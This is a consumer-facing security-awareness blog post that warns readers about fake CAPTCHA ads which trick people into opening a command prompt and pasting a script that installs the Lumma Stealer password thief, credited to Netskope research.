Don’t Fall Victim to 2025’s Newest Hacks
In the last year, we have seen AI super-charge cyberattacks by assisting with finding new attack vectors and helping online criminals perfect their grammar while also finding the perfect “hook” to engineer your behavior. We are already seeing this trend continue into 2025, in this blog post we will explore a new social engineering technique that abuses your trust in CAPTCHAs.
You may have read the above and thought, “I don’t know what a CAPTCHA is, so there’s no way this could apply to me!” Unfortunately, that’s what makes this technique so insidious. CAPTCHAs are those small tests on the internet that take 10–20 seconds of your time to complete a mundane task, proving your humanity during account creations, sign-ins, online purchases, event registrations, and every other task online where developers around the world want to prevent hackers from automating. If you’re reading this blog, then you undoubtedly have an internet connection and know how to use it! Hopefully, by now, we’ve put a name to the face of what a CAPTCHA is, and you’re starting to see how the “trust” I mentioned earlier plays into our behavior online.
Now that we have our definitions in-check lets discuss the details of this hack!
When you need to enter a CAPTCHA online, usually they ask you to match patterns, re-enter text that has been stretched or distorted, move something with your mouse, align a picture, perform object identification among different but similarly colored or shaped objects, and so forth. That’s already a pretty long list of different tasks we are all in the habit of doing online, whenever asked, without thinking. All of us have seen and will continue to see these online test evolve year over year, in 2012, most of us probably could not have predicted the next type of task these tests would mandate and now 13 years later in 2025 it would still be impossible to do anything other than guess.
If you were on a website trying to do a task, and you were presented with a 15 second task asking you to press some keyboard shortcuts then copy & paste some text, would you? That is exactly what this cyber threat is designed to make you do!
By purchasing prime advertising spots on real webpages and replacing the ads with fake CAPTCHA tasks, hackers have successfully stolen passwords from people of all ages across the world in a widespread hacking campaign. In the nitty-gritty details the shortcuts they are asking you to do opens a discrete command prompt window you may not be used to seeing, and then pasting in a script that downloads a virus known as “Lumma Stealer”. The name alone “Lumma Stealer” probably tells you everything you need to know, this is an application designed to steal your passwords, and your data, like banking information. Unless you’re an IT or CyberSecurity professional, the way the task is presented seems innocent and quick enough that most people will do it giving little thought.
This is what makes human-centric security so very important.
We live in a world where it seems like everything wants to take either our money, or the newest commodity on the block, our information. Abuse of our trust is rampant online from complex dis-information campaigns like fake news, to other individuals just hoping to make our day a little more unpleasant. It’s on us to ensure we stay up to date and stay conscious of the latest cyber-threats that may come our way.
Hopefully this encourages you to think about some of the things we have learned to trust in our always-online culture, and how that trust could be abused by anyone.
Credit to Netskope Threat Labs for providing technical details and information on the scope of this attack.
Lumma Stealer: Fake CAPTCHAs & New Techniques to Evade Detection – Netskope
